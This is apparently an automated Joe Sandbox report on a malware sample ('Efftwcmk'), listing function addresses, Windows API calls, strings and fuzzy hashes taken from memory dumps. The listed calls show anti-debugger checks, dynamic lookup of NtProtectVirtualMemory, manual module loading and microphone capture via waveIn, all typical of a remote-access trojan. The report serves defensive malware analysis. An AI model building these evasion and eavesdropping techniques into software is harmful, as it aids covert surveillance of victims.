Function 2D23B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 2D23B509

Strings

| , xrefs: 2D23B53C
%02i:%02i:%02i:%03i , xrefs: 2D23B51E
Pk)-N)-, xrefs: 2D23B4EF

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i $Pk)-N)-
API String ID: 481472006-3445371248
Opcode ID: ef56da97ef1bce76ff2e539b948c553160e4aa7ef4477a89e3fea354130a4958
Instruction ID: 827027e8f45011abf6559d739aeb453ee762c8c9cf05a64609ac9f163a9905f3
Opcode Fuzzy Hash: ef56da97ef1bce76ff2e539b948c553160e4aa7ef4477a89e3fea354130a4958
Instruction Fuzzy Hash: CE11817244C65456C305DB61DC889BFB3E8EF64600F510939F695A21D0EF28EA49C666

Function 2D224F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 2D224F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 2D224FCD
CreateThread.KERNEL32(00000000,00000000,2D225150,?,00000000,00000000), ref: 2D224FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 2D224F94

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 785074a16ba2cb8694c3f199ea63e9112b23782ed109bbcc20750287f6d48fa2
Instruction ID: 7fbf2f6f62ce6fe73616254d24432b28d6cf4125feac54192a0eb0bee81dabfe
Opcode Fuzzy Hash: 785074a16ba2cb8694c3f199ea63e9112b23782ed109bbcc20750287f6d48fa2
Instruction Fuzzy Hash: 2E11E0318446846AD721AA76CC4CFAB7FBCEBE7A10F00411EF54172251DA74A146CBB2

Function 2D26C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 2D26C28C
GetLastError.KERNEL32 ref: 2D26C296
__dosmaperr.LIBCMT ref: 2D26C29D

Strings

Pk)-N)-, xrefs: 2D26C255

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: Pk)-N)-
API String ID: 2336955059-771429351
Opcode ID: e5d0344a4ad99ed31c446b5d518b5c951649c5c27693e834a2dba08d8d2f462c
Instruction ID: 78ea961edae9fde1b22fbca37f8b779729e3ce14cee6a8b070982fdc2d92f37e
Opcode Fuzzy Hash: e5d0344a4ad99ed31c446b5d518b5c951649c5c27693e834a2dba08d8d2f462c
Instruction Fuzzy Hash: A2012D32654215ABDF059FE9CC4499E3B29FB86230B240259ED10B7290FA31D98097F0

Function 2D23CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,2D294EF8,2D294EF8,Pk)-N)-,2D224A40), ref: 2D23CB09
LocalFree.KERNEL32(?,?), ref: 2D23CB2F

Strings

@J"-, xrefs: 2D23CAED
Pk)-N)-, xrefs: 2D23CAE1

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: @J"-$Pk)-N)-
API String ID: 1427518018-590280348
Opcode ID: 2ed9e8296d94dc045660ef4044f3372f76ef479d31c441b0e1ad9be2d06b3797
Instruction ID: c9d087f8d4b29693f5a884377ec2c255170a4334703955fe3a8e2b9ad8d11a5a
Opcode Fuzzy Hash: 2ed9e8296d94dc045660ef4044f3372f76ef479d31c441b0e1ad9be2d06b3797
Instruction Fuzzy Hash: 1EF0FF70A44109AADB1897A5CC4EEFFB73DDFA8201F00403AB605B2180EE616E159625

Function 02C8D5D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02C8D5E0
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02C8D5F2

Strings

CheckRemoteDebuggerPresent, xrefs: 02C8D5EC
KernelBase, xrefs: 02C8D5DB

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 1646373207-539270669
Opcode ID: 73a5328825a58e6e1d9c8b4c9b2ccfa6d42736c24315d459dae0243617560b98
Instruction ID: 9f170175e3e64c7616a1a00c9ba6514cf1468bfc4b49a5f534ec621b880d1f3e
Opcode Fuzzy Hash: 73a5328825a58e6e1d9c8b4c9b2ccfa6d42736c24315d459dae0243617560b98
Instruction Fuzzy Hash: 2EF0A03090464CAADB11BAF888887DCFBAD5B0532CF648794A43A621C1E77107808795

Function 02C879B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02C879C5
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02C879CB

Strings

NtProtectVirtualMemory, xrefs: 02C879BB
C:\Windows\System32\ntdll.dll, xrefs: 02C879C0

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 7e7666b382b1986447caf8be049284a019b5833dff2d9c751de71c9d93913240
Instruction ID: eecc970a5dcfe8cee9c0a815fd89bebefbd07fe93f564d62e6c6a9934078d84d
Opcode Fuzzy Hash: 7e7666b382b1986447caf8be049284a019b5833dff2d9c751de71c9d93913240
Instruction Fuzzy Hash: 3BE08CB6680208BF9B40EF9CEC80ECB37ECAB1C3407008814FA19C3200C631E9619FB0

Function 02C8D574 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02C8D778,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D57A
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent,KernelBase,?,02C8D778,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8D58C

Strings

IsDebuggerPresent, xrefs: 02C8D586
KernelBase, xrefs: 02C8D575

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: a1376f46d0cb8d0169993b9b0bc5e0d05bbbee50bb1b3e9f060260df271cb9c2
Instruction ID: 2e89a98e8518ca0cc9ff562fe83876bd02efd8aabff94080599baec05aebe540
Opcode Fuzzy Hash: a1376f46d0cb8d0169993b9b0bc5e0d05bbbee50bb1b3e9f060260df271cb9c2
Instruction Fuzzy Hash: 64D012E2351B202EB60036F41CC482E02CC8949A2E3B04E72B02BD20D2E6B68A526710

Function 02C7C3EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02C9910B,00000000,02C9911E), ref: 02C7C3F2
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,02C9910B,00000000,02C9911E), ref: 02C7C403

Strings

GetDiskFreeSpaceExA, xrefs: 02C7C3FD
kernel32.dll, xrefs: 02C7C3ED

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 219b7a50b14b1e86d84a6078d872226122f0ddaa08fc0e41743e5d8a448b0993
Instruction ID: 95b831a1414e19cedd9d9fdc4aa2d8c3d9ae9c3a5172afe9cceeea0f8ef5db47
Opcode Fuzzy Hash: 219b7a50b14b1e86d84a6078d872226122f0ddaa08fc0e41743e5d8a448b0993
Instruction Fuzzy Hash: 6DD0C9F0A807475FF7006FB2688DB3226DC9B88348F50A976E41156102D7B2C66A9FDC

Function 02C7E160 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C7E20F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C7E22B
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C7E2A2
VariantClear.OLEAUT32(?), ref: 02C7E2CB

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction ID: 9c086bdbd0d1a91bb0f06f570b98651ba34f6b0c3ca377e5dd0e7ecfd973ee76
Opcode Fuzzy Hash: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction Fuzzy Hash: 86410876A012299BCB62EB58CC90BD9B3BDAF99314F0041D5E649E7252DB30AF809F50

Function 02C7ACB4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
LoadStringA.USER32 ref: 02C7ADA6

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 140af53075128feb72b0ef990fabcfdcd240008add6e417d9a83f5ff0e0ce77b
Instruction ID: 926b506ec6e8a7683f876b50c7830ea33533a3a699815006a2540584f00f23b4
Opcode Fuzzy Hash: 140af53075128feb72b0ef990fabcfdcd240008add6e417d9a83f5ff0e0ce77b
Instruction Fuzzy Hash: E4414B70A002589FDB21EB68CD84BDEB7FDAB18305F4040E9A648E7241DB749F88DF50

Function 02C7ACB2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
LoadStringA.USER32 ref: 02C7ADA6

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 1f45811cf6c5c5103ef65edbfbceeba7ebec373099da6d7913b51efa9f3c0b79
Instruction ID: 2f86eba4aaebbd4745cd58621a12d8847c998158fb34206fde59a3da604acb80
Opcode Fuzzy Hash: 1f45811cf6c5c5103ef65edbfbceeba7ebec373099da6d7913b51efa9f3c0b79
Instruction Fuzzy Hash: C9415970A00258AFDB21EB68CD84BDEB7FDAB18305F4040E9A648E7241DB749F88DF50

Function 2D23C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 2D23C49E
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,2D22412F,2D285E74), ref: 2D23C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 2D23C4D7
CloseHandle.KERNEL32(00000000), ref: 2D23C4E5

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: d0e28248a11062e0c03599ee8ae30ebd627cce6bed41e7a451b9f8956437ab90
Instruction ID: b8544643d820851cb84dbf6a0438aa2d21723e81b3a1131803a311cca3f303bf
Opcode Fuzzy Hash: d0e28248a11062e0c03599ee8ae30ebd627cce6bed41e7a451b9f8956437ab90
Instruction Fuzzy Hash: 3DF096F12853187FF7215E25AC88FBB376DEB8BAA8F010129FA01F22C0DA294D059135

Function 2D269E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 2D269F0F
GetLastError.KERNEL32 ref: 2D269F2B

Strings

Pk)-N)-, xrefs: 2D269E3E

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: Pk)-N)-
API String ID: 203985260-771429351
Opcode ID: a2bf4b0fa0b648c12abc62b07e8ed02ffff625be61777f3fda64f94c8a46585b
Instruction ID: 5267f734867d98257bc64be94c55f3a4e1675bf816d427909d82acf645ef24e5
Opcode Fuzzy Hash: a2bf4b0fa0b648c12abc62b07e8ed02ffff625be61777f3fda64f94c8a46585b
Instruction Fuzzy Hash: 7F31B535680306EBCB1A9E55CD44FBB37A8EF51A50F11416AEA24BA281DE30DBC0C7F1

Function 2D26B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 2D26B7DB
GetLastError.KERNEL32 ref: 2D26B804

Strings

Pk)-N)-, xrefs: 2D26B733

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: Pk)-N)-
API String ID: 442123175-771429351
Opcode ID: 65ad3356d19ead9c3fb43c292b2a63a9fa8d05ea0d834103896613bb74851632
Instruction ID: ed568556c105b0ab158a3e7292cb6cbd697c247e991924c98396e3ece685b028
Opcode Fuzzy Hash: 65ad3356d19ead9c3fb43c292b2a63a9fa8d05ea0d834103896613bb74851632
Instruction Fuzzy Hash: DE317176A103199BCB25CF59CC809DAB3F9FF88751F2085AAE509E7351E730A981CB60

Function 02C71C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96fd4d1e1b5c626e910bcd346426052a30f342fcad695e5e463a2ca315ed8925
Instruction ID: 2c2ac805180f7b5ab817e4a2ddadc2ef780f371e9106ba7be215c4b9631e6f8d
Opcode Fuzzy Hash: 96fd4d1e1b5c626e910bcd346426052a30f342fcad695e5e463a2ca315ed8925
Instruction Fuzzy Hash: FDA1F4B67106000BD719AA7D9C853BDB3C69BC4265F2C827EE11DCB381EBE9CA429750

Function 02C79464 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C79552), ref: 02C794EA
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 02C794F0

Strings

yyyy, xrefs: 02C794C5

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 1927837d3e8c49fc0db76fc60f9dd42cd24625c6bebb2991ebdab50bbbb3fde9
Instruction ID: 6f4152d2e6a10940a38a28b22f9566e1f751fa0c3ba0c6c2a93fe3525d19a0e8
Opcode Fuzzy Hash: 1927837d3e8c49fc0db76fc60f9dd42cd24625c6bebb2991ebdab50bbbb3fde9
Instruction Fuzzy Hash: 5C218E71A002289FDB64DFA8C841AAEB3B9EF48710F5141A5E905E7340E734DF40EBA5

Function 2D26B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 2D26B6ED
GetLastError.KERNEL32 ref: 2D26B716

Strings

Pk)-N)-, xrefs: 2D26B654

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: Pk)-N)-
API String ID: 442123175-771429351
Opcode ID: 74159985956fc6b80f7b3299c0b25446cea06e8dd2154500062db1ec446417f6
Instruction ID: cf3ec33dfeb16903b1388f804a1f30966a6d19615ccd9e1dfab86e30d2fc2268
Opcode Fuzzy Hash: 74159985956fc6b80f7b3299c0b25446cea06e8dd2154500062db1ec446417f6
Instruction Fuzzy Hash: 40218035A103199FCB25CF69CC80BDAB3F9FB48305F1444A9EA4AE7251D730AA81CB70

Function 2D26F077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 2D268215: GetLastError.KERNEL32(?,2D25F720,2D25A7F5,2D25F720,2D294EF8,Pk)-N)-,2D25CE15,FF8BC35D,2D294EF8,2D294EF8), ref: 2D268219
Part of subcall function 2D268215: _free.LIBCMT ref: 2D26824C
Part of subcall function 2D268215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D26828D
Part of subcall function 2D268215: _abort.LIBCMT ref: 2D268293

_abort.LIBCMT ref: 2D26F0A9
_free.LIBCMT ref: 2D26F0DD

Strings

Wk, xrefs: 2D26F0E3, 2D26F0EB

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorLast_abort_free
String ID: Wk
API String ID: 289325740-3902205105
Opcode ID: 1826d1d86dd81db4c6959550e3448faddbad64c599a715053cb8a02ac0fdb52a
Instruction ID: 548d854bf07b89dbb574d50c06dcbc81f7305efcac9766e6be5aec38d7326808
Opcode Fuzzy Hash: 1826d1d86dd81db4c6959550e3448faddbad64c599a715053cb8a02ac0fdb52a
Instruction Fuzzy Hash: 4601CE31D867328BCB22CF698C00269B770FF14B61F160269DA64732C0CB3429828FE1

Function 2D2217EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(0068D080,00000020,?), ref: 2D221849
waveInAddBuffer.WINMM(0068D080,00000020), ref: 2D22185F

Strings

XM)-, xrefs: 2D2217F8

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XM)-
API String ID: 2315374483-1445340508
Opcode ID: 6dba14d924994ae01403ec336e4a4e1cc8689b3e2c7b54a24011fcada199267d
Instruction ID: 376162e903da362f75ca5d3ac0c10f80b6880cc6d3457a4f710152d7392c3475
Opcode Fuzzy Hash: 6dba14d924994ae01403ec336e4a4e1cc8689b3e2c7b54a24011fcada199267d
Instruction Fuzzy Hash: 1101AD76701710BFD7208F24CC8CAA67BB9FF49A18B124139F615D3741EB396C108BA8

Function 2D268957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,2D25AAB7), ref: 2D268996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 2D268972
Pk)-N)-, xrefs: 2D268959

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$Pk)-N)-
API String ID: 2086374402-3309323792
Opcode ID: 897f7c635c793565cec55d016110d32eee8efe0e1bb486c4079adc1a432c1c59
Instruction ID: b39dcc96d110aee1d5f94b2ecc474e382112333584f542dae23ce9864d8066ba
Opcode Fuzzy Hash: 897f7c635c793565cec55d016110d32eee8efe0e1bb486c4079adc1a432c1c59
Instruction Fuzzy Hash: C1E0E571A8A318A7D721DB248C48E7EBB74DF59A11F054168FE0977384DA315E009AE9

Function 2D27554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

___initconout.LIBCMT ref: 2D27555B

Part of subcall function 2D276B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 2D276B30

WriteConsoleW.KERNEL32 ref: 2D27557E

Strings

Pk)-N)-, xrefs: 2D27554D

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: Pk)-N)-
API String ID: 3087715906-771429351
Opcode ID: 951eafa0153cb621a2ddf71720535ff2d4f0bdc20140cb8e1e99e9dbaece3f97
Instruction ID: 1282dae125f091091577fe8f338cdf3ccdc320111402d6557c30917c03605dcc
Opcode Fuzzy Hash: 951eafa0153cb621a2ddf71720535ff2d4f0bdc20140cb8e1e99e9dbaece3f97
Instruction Fuzzy Hash: A3E0E5305841456BF620CB65CC09AB6737DEB01B74F500318FA24D72C0DB34E900C650

Function 2D260C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,2D221D55), ref: 2D260D27
GetLastError.KERNEL32 ref: 2D260D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2D260D90

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e7dd15b391e4842139a511ebf23995076313c57a58bba67dbe1b275e4804599
Instruction ID: 707280b7f53c6b9cf5d2dd136cd5cabd09c1dd70ee565ff49b58e35ca7e1ffd0
Opcode Fuzzy Hash: 6e7dd15b391e4842139a511ebf23995076313c57a58bba67dbe1b275e4804599
Instruction Fuzzy Hash: 4C41E675684307AFCB118F65CD44BBA7BA4EF01350F2182A9F954B7291EB31A981DBF0

Function 2D231B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,2D231EF0), ref: 2D231B8C
IsBadReadPtr.KERNEL32(?,00000014,2D231EF0), ref: 2D231C58
SetLastError.KERNEL32(0000007F), ref: 2D231C7A
SetLastError.KERNEL32(0000007E,2D231EF0), ref: 2D231C91

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
